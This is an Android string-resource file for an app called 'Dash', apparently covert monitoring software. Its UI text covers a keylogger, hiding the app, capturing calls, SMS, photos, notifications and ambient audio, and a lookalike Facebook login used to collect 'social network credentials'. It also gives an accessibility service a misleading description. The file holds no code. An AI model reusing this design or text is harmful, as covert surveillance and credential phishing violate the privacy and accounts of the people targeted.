<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Dash</string>
    <string name="login_hint_user">Mail</string>
    <string name="login_hint_passw">Password</string>
    <string name="login_btn_sign_in">LOG IN</string>
    <string name="login_txt_sign_up">Don't have an account yet? Sign up</string>
    <string name="login_success">Login Successful</string>
    <string name="login_failed_try_again_later">Login failed, please try again later</string>
    <string name="login_failed">Login error</string>
    <string name="logging_in">Logging in</string>
    <string name="login_btn_sign_up">SIGN UP</string>
    <string name="sign_up_failed">Sign up failed</string>
    <string name="sign_up_failed_try_again_later">Registration failed, please try again later</string>
    <string name="register_pass_match">Passwords do not match</string>
    <string name="login_hint_passw_repeat">Repeat password</string>
    <string name="maps">Location</string>
    <string name="calls">Calls</string>
    <string name="messages">SMS</string>
    <string name="photographic">Camera</string>
    <string name="sign_out">Sign out</string>
    <string name="show_app">Show app</string>
    <string name="hide_app">Hide app</string>
    <string name="keylog">KeyLog</string>
    <string name="clear_keylogger_list">Clear KeyLogger list</string>
    <string name="duration_default">0:00</string>
    <string name="failed_calls_audios">Error getting audios from calls</string>
    <string name="failed_sms">Error receiving messages</string>
    <string name="failed_photo">Failed to get photos</string>
    <string name="failed_social">Failed to get credentials</string>
    <string name="failed_keys_text">Failed to get keyLogger</string>
    <string name="not_have_audios_yet">You still don't have audios.</string>
    <string name="not_have_sms_yet">You still have no messages</string>
    <string name="not_have_key_text">You don't have keyLog.</string>
    <string name="not_have_photo_yet">You don't have photos yet</string>
    <string name="social">Social</string>
    <string name="setting">Settings</string>
    <string name="clear_calls_list">Delete calls</string>
    <string name="clear_sms_list">Delete messages</string>
    <string name="clear_photo_list">Delete photos</string>
    <string name="clear_social_credentials">Clear credentials</string>
    <string name="closed_for_inactivity">Closed due to inactivity</string>
    <string name="enable_permission">Permission enabled:</string>
    <string name="failed_delete_file">Failed to delete file</string>
    <string name="failed_delete_files">Failed to delete files</string>
    <string name="delete">Delete</string>
    <string name="clear">Clear</string>
    <string name="title_dialog">Message</string>
    <string name="message_dialog_delete_call_audio">Do you want to delete the selected call audios?</string>
    <string name="message_dialog_delete_photo">Do you want to delete the selected photos?</string>
    <string name="message_dialog_delete_sms">Do you want to delete the selected messages?</string>
    <string name="message_dialog_clear_calls">Do you want to delete the call list?</string>
    <string name="message_dialog_clear_photos">Do you want to delete the photo list?</string>
    <string name="message_dialog_clear_credentials">Do you want to delete the credentials?</string>
    <string name="message_dialog_clear_sms">Do you want to delete the message list?</string>
    <string name="message_dialog_clear_keylogger">Do you want to clear the keylogger list?</string>
    <string name="go_to_setting">Go to settings</string>
    <string name="get_front_photo">Get front photo</string>
    <string name="get_rear_photo">Get back photo</string>
    <string name="nav_delete_photo">Delete photo</string>
    <string name="nav_download_photo">Download photo</string>
    <string name="ops">Oops! 😢</string>
    <string name="oops">Oops!</string>
    <string name="message_dialog_permission_photo_disable">The permission to obtain photos has been deactivated.</string>
    <string name="message_permission_social_disable">The permission to obtain credentials has been disabled.</string>
    <string name="put_your_access_code">Put your access code</string>
    <string name="enable_code_access">Enable access code</string>
    <string name="change_code_access">Change access code</string>
    <string name="change">Change</string>
    <string name="note_code_access">Note: If you forgot the code, you will need to remove and reinstall the application.</string>
    <string name="lock_screen">Lock app</string>
    <string name="finish_application_for_inactivity">End application due to inactivity</string>
    <string name="enable_app_finish">Enable end application</string>
    <string name="change_app_finish_time">Change finish time</string>
    <string name="assigns_a_time_interval_to_terminate_the_application_due_to_inactivity">Assign a time interval to terminate the application due to inactivity. It may be necessary to restart the application for it to take effect.</string>
    <string name="current_access_code">Current access code</string>
    <string name="new_access_code">New access code</string>
    <string name="repeat_new_access_code">Repeat the new access code</string>
    <string name="one_minute">1 minute</string>
    <string name="two_minute">2 minutes</string>
    <string name="five_minute">5 minutes</string>
    <string name="error_code_access">Enter 4-digit code</string>
    <string name="error_current_code_access">Incorrect current code</string>
    <string name="error_not_match_code_access">Access codes do not match</string>
    <string name="error_database_connection">Failed to establish a connection to the database.</string>
    <string name="credentials">Social network credentials</string>
    <string name="email">User:</string>
    <string name="password">Password</string>
    <string name="ellipsis">…</string>
    <string name="volume_up">Please turn up the volume</string>
    <string name="failed_device">Previously registered device</string>
    <string name="recording">Recordings</string>
    <string name="failed_record_audios">Error getting recordings</string>
    <string name="clear_record_list">Delete recordings</string>
    <string name="message_dialog_record_audio">Assign the recording time</string>
    <string name="message_dialog_delete_record_audio">Do you want to delete the selected recorded audios?</string>
    <string name="ten_minute">10 minutes</string>
    <string name="fifteen_minute">15 minutes</string>
    <string name="thirty_minute">30 minutes</string>
    <string name="one_hour">1 hour</string>
    <string name="submit">Submit</string>
    <string name="msj_snackbar_record">Record command sent, wait for recording to finish.</string>
    <string name="message_dialog_clear_record">Do you want to delete the list of recordings?</string>
    <string name="message_dialog_clear_notifications">Do you want to clear the list of notification messages?</string>
    <string name="failed_notifications_text">Failed to get notification messages</string>
    <string name="not_have_notifications_text">You have no notification messages.</string>
    <string name="notify">Notifications</string>
    <string name="message_dialog_delete_notify">Do you want to delete the selected notification messages?</string>
    <string name="ready_to_continue">Successful login, everything ready to go.</string>
    <string name="checking_root">"Checking root and enabling KeyLogger accessibility "</string>
    <string name="msg_dialog_enable_keylogger">Root not found, enable KeyLogger accessibility in \"settings - accessibility - services - child accessibility \"</string>
    <string name="msg_dialog_enable_overdraw">You need to activate the permission of the giveaway on other applications to be able to take photos.</string>
    <string name="msg_dialog_enable_usage_stats">"You must activate the applications with permission to use access to get social credentials "</string>
    <string name="enable_keylogger_success">"Successful accessibility to KeyLogger "</string>
    <string name="accessibility_service_label">Accessibility child</string>
    <string name="accessibility_service_description">" Child accessibility allows users to avoid or limit access to its handling or its content to minors"</string>
    <string name="msg_dialog_enable_accessibility_service">"You must enable the accessibility service for the application to work properly. "</string>
    <string name="enable_service">ENABLE SERVICE ACCESSIBILITY</string>
    <string name="enable_usage_stats">ENABLE USAGE STATISTICS</string>
    <string name="address_not_found">Address not found</string>
    <string name="hiding">Hiding…</string>
    <string name="all_fields">Enter all fields</string>
    <string name="enable_overdraw">ENABLE CAMERA</string>
    <string name="permission_request">Permission request</string>
    <string name="message_permission">Permission to read contacts, location, record audio, read phone status, receive sms, camera and write storage is required for this app. Do you want to try again?</string>
    <string name="message_permission_never_ask_again">Some permissions were denied, without them the application will not work properly. To activate them you must go to \"Settings - applications - secondary permissions \" and activate the corresponding permissions. Do you want to activate them now?</string>
    <string name="message_permission_storage">Permission to read / write storage is required for this app.</string>
    <string name="message_permission_never_ask_again_storage">"The storage permission was denied, without it the application will not work properly. To activate them you must go to \"Settings - applications - Dash - permissions\" and activate the corresponding permissions. Do you want to activate them now? "</string>
    <string name="select_type">Select type:</string>
    <string name="enable_service_notification_listener">ENABLE SERVICE NOTIFICATIONS</string>
    <string name="clear_notify_message_list">Clear message list</string>
    <string name="selected">selected</string>
    <string name="removing">removing…</string>
    <string name="email_social">Phone or email</string>
    <string name="pass_social">Password</string>
    <string name="or">Or</string>
    <string name="forgot_password">HAVE YOU FORGOTTEN YOUR PASSWORD?</string>
    <string name="create_new_facebook_account">Create facebook account</string>
    <string name="already_have_account">I already have an account</string>
    <string name="select_child">Select child</string>
    <string name="new_child">New child</string>
    <string name="activated_success">Activated successfully !!</string>
    <string name="activating">Activating…</string>
    <string name="add_to_whitelist">ADD TO WHITE LIST</string>
    <string name="already_activated">Already activated</string>
    <string name="change_photo">Change photo</string>
    <string name="characters_child">Contains invalid characters</string>
    <string name="check_root_access">Checking root access</string>
    <string name="disable_keylogger">Keylogger disabled</string>
    <string name="disable_notification_message">Notification message disabled</string>
    <string name="disable_photo">Photos disabled</string>
    <string name="disable_recording">Environment recording disabled</string>
    <string name="disable_social">Credentials disabled</string>
    <string name="disabled_gps">GPS disabled</string>
    <string name="enable_all_permissions">Please enable all permissions</string>
    <string name="enable_keylogger">Keylogger enabled</string>
    <string name="enable_notification_message">Notification message enabled</string>
    <string name="enable_photo">Enabled get photos</string>
    <string name="enable_recording">Environment recording enabled</string>
    <string name="enable_social">Enabled get credentials</string>
    <string name="enabled_gps">GPS enabled</string>
    <string name="failed_activate">Activation failed, try again.</string>
    <string name="get_childs">Getting childs…</string>
    <string name="maps_installed">Google Maps app not installed</string>
    <string name="message_dialog_permission_location_disable">The location permission has been disabled.</string>
    <string name="new_or_current_child">New or current child</string>
    <string name="search_calls">Search calls</string>
    <string name="search_keys">Search keylog</string>
    <string name="search_notify">Search notifications</string>
    <string name="search_photos">Search photos</string>
    <string name="search_records">Search recording</string>
    <string name="search_sms">Search sms</string>
    <string name="upload_photo_child">Uploading photo…</string>
    <string name="search_photos_date">Search photos by date</string>
    <string name="search_records_date">Search recording by date</string>
    <string name="msj_snackbar_current_record">You have a pending recording</string>
    <string name="recording_go">Recording…</string>
</resources>
